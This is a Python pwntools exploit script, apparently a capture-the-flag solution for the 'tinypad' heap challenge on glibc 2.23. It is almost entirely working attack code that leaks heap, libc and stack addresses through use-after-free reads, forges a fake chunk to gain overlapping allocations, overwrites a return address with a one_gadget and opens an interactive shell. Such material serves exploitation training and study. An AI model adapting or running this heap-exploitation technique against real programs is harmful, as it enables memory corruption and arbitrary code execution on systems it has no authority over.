1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88
| from pwn import * context.log_level = 'debug' import binascii
libc_file_name = '/home/pandaos/Projects/pwn/glibc/2.23/64/lib/libc-2.23.so' ld_file_name = '/home/pandaos/Projects/pwn/glibc/buu/ubuntu16/ld-linux-x86-64.so.2' bin_file = './tinypad'
libc = ELF(libc_file_name)
elf = ELF(bin_file) p = process([ld_file_name, bin_file], env = {"LD_PRELOAD": libc_file_name})
def Add(size, content): p.sendlineafter('(CMD)>>> ', 'A') p.sendlineafter('(SIZE)>>> ', str(size)) p.sendlineafter('(CONTENT)>>> ', content)
def Edit(index, content): p.sendlineafter('(CMD)>>> ', 'E') p.sendlineafter('(INDEX)>>> ', str(index)) p.sendlineafter('(CONTENT)>>> ', content) p.sendlineafter('(Y/n)>>> ', 'Y')
def Del(index): p.sendlineafter('(CMD)>>> ', 'D') p.sendlineafter('(INDEX)>>> ', str(index))
def Exit(): p.sendlineafter('(CMD)>>> ', 'Q')
Add(0x90, 'A' * 0x80) Add(0x100, 'B' * 0x80) Add(0x90, 'B' * 0x80) Add(0xf0, b'\xCC' * (0x100 - 1))
Del(3)
Del(1)
p.recvuntil('INDEX: 1\n # CONTENT: ') leak_raw_heap = u64(p.recvn(6) + b'\x00\x00') print("leak raw heap: ", hex(leak_raw_heap))
p.recvuntil('INDEX: 3\n # CONTENT: ') leak_raw_libc = u64(p.recvn(6) + b'\x00\x00') libc_base = leak_raw_libc - 0x39bb78 print("libc base: ", hex(libc_base))
fake_chunk_addr = 0x602040 tsize = leak_raw_heap + 0xa0 - fake_chunk_addr print("fake size: ", hex(tsize)) fake_chunk = p64(0) + p64(tsize + 1) fake_chunk += p64(fake_chunk_addr) fake_chunk += p64(fake_chunk_addr) fake_chunk += p64(fake_chunk_addr) fake_chunk += p64(fake_chunk_addr) Add(0x98, b'\x11' * 0x90 + p64(tsize)) Add(0x98, b'\x22' * 0x97) Edit(3, fake_chunk)
gdb.attach(p) input('>')
Del(4) Del(3)
Add(0xe0, 'A' * 0x20)
fake_pad = p64(0xAABBCCDD11223344) fake_pad += p64(libc_base + libc.symbols['__environ'])
Add(0xe0, fake_pad) p.recvuntil('INDEX: 1\n # CONTENT: ') leak_stack = u64(p.recvn(6)+b'\x00\x00') print("leak stack: ", hex(leak_stack)) Edit(4, b'AAAAAAAA' + p64(leak_stack - 0xe8))
one_gadget = 0x3f3d6 + libc_base Edit(1, p64(one_gadget)) Exit() p.interactive()
|